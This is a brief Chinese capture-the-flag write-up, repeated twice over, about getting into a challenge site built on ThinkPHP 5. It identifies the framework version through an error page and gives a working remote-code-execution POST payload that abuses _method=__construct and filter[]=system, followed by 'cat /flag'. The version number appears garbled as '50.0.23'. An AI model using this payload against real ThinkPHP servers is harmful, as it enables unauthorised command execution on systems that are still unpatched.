进入网站,看到提示,powered By THINKPHP5
知道肯定与thinkphp5有关
传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧)
版本为50.0.23
post提交
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
触发命令执行漏洞
cat /flag
进入网站,看到提示,powered By THINKPHP5
知道肯定与thinkphp5有关
传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧)
版本为50.0.23
post提交
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
触发命令执行漏洞
cat /flag